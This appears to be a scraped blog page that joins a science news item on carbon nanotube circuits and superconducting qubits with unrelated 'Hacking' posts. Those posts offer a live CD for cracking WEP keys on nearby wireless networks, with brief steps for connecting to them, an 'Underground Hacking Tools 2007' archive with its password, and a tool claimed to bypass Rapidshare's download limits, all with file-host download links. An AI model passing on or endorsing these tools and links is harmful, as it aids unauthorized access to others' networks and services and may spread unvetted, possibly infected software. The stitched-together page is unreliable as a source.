Already, some elements of computer circuits such as transistors have been constructed from individual carbon nanotubes. However, scientists have been as yet unable to precisely arrange nanotubes into circuit patterns, which is necessary to determine how each tube conducts electricity.

In a development that is expected to bring carbon nanotubes one step closer to commercial use, the Leeds University researchers have developed a technique of growing nanotubes on a perforated ceramic grid.

The technique allows the research team to determine the electrical propesrties of individual nanotubes, after which the tubes are accurately positioned on a surface using a tweezer-like device.

“With this technique we can make carbon nanotube devices of a complexity that is not achievable by most other means,” said Chris Allen, of the Quantum Information Group at the University of Leeds.

Meanwhile, other groups of scientists claim that superconductors are key to future computing, as they may be able to harness the power of quantum physics to boost computer power tremendously.

Superconductors are materials that conduct electricity with zero electrical resistance, which effectively means that an electric current can circulate around a superconducting loop for an indefinite period of time.

By linking the electric current in a loop to a quantum superposition state, superconductors may act as quantum bits, or qubits, in quantum computing.

Qubits are able to exist in multiple states at any one time, which massively increases the amount of information that can be encoded in a quantum computer’s memory.

According to physicist Hans Mooij, one of the biggest challenges in making quantum computers this way is to progress from two to three qubits that communicate with each other.

To maintain future developments in quantum computing, Mooij and his team of researchers at the Delft University of Technology in the Netherlands have developed a particular approach that supports future transitions from three working, communicating qubits, to larger groups of superconductors.

“With our qubit, once we have three set up we can move on to twenty or fifty,” he said.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Hacking

Wireless Hacking




This version is for all systems except systems with the Intel B/G wireless cards (IPW2200). Live CD with all the tools you need to hack a WLAN / wireless Access point.

WEP is an encryption scheme, based on the RC-4 cipher, that is available on all 802.11a, b and g wireless products. WEP uses a set of bits called a key to scramble information in the data frames as it leaves the access point or client adapter and the scrambled message is then decrypted by the receiver.

Both sides must have the same WEP key, which is usually a total of 64 or 128 bits long. A semi-random 24 bit number called an Initialization Vector (IV), is part of the key, so a 64 bit WEP key actually contains only 40 bits of “strong” encryption while a 128 bit key has 104. The IV is placed in encrypted frame’s header, and is transmitted in plain text.

Traditionally, crackinging WEP keys has been a slow and boring process. An attacker would have to capture hundreds of thousands or millions of packets process that could take hours or even days, depending on the volume of traffic passing over the wireless network. After enough packets were captured, a WEP crac*ing program such as Aircrack would be used to find the WEP key.

Fast-forward to last summer, when the first of the latest generation of WEP cracking tools appeared. This current generation uses a combination of statistical techniques focused on unique IVs captured and brute-force dictionary attacks to break 128 bit WEP keys in minutes instead of hours. As Special Agent Bickers noted, “It doesn’t matter if you use 128 bit WEP keys, you are vulnerable!”

Basic Directions:

* Boot From CD
* Get The WEP Key
* Write It Down
* Reboot Into Windows
* Connect Using Wep Key.

Download :

http://www.filefactory.com/file/0ecdf2/

http://www.filefactory.com/file/247443/

http://www.filefactory.com/file/7b401f/

http://www.filefactory.com/file/1f42f3/

http://www.filefactory.com/file/a12e33/

http://www.filefactory.com/file/13e2b2/

http://www.filefactory.com/file/7a9bf0/


Underground Hacking Tools 2007




Download :
http://rapidshare.com/files/57368327/UHT_by_MehiriyeT.part1.rar http://rapidshare.com/files/57401962/UHT_by_MehiriyeT.part2.rar
RAR Pass:www.elemanyak.net
http://rapidshare.com/users/T8FM29


RapidHacker v3.0


Tested and Working - No more download limit !!! Rapid Hacker can hack / crack / bypass waiting limit at Rapidshare.com and Rapidshare.de Just copy-paste the Rapidshare link and get unlimited downloads.
Spyware and Virus Free.

INSTRUCTIONS :
• paste the rapidshare link
• click "Go"

* Software ni sungguh keren deh.. bisa donlod rapidshare tanpa harus nunggu giliran *
Lo tinggal paste the rapidhsare link, trus klik go... OK...

Selamat Mencoba

Download :
http://www.aliveupload.net/file/28/RapidHacker-Final-v3-0-rar.html
http://afilehosting.com/download.php?id=FD41EBC92

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS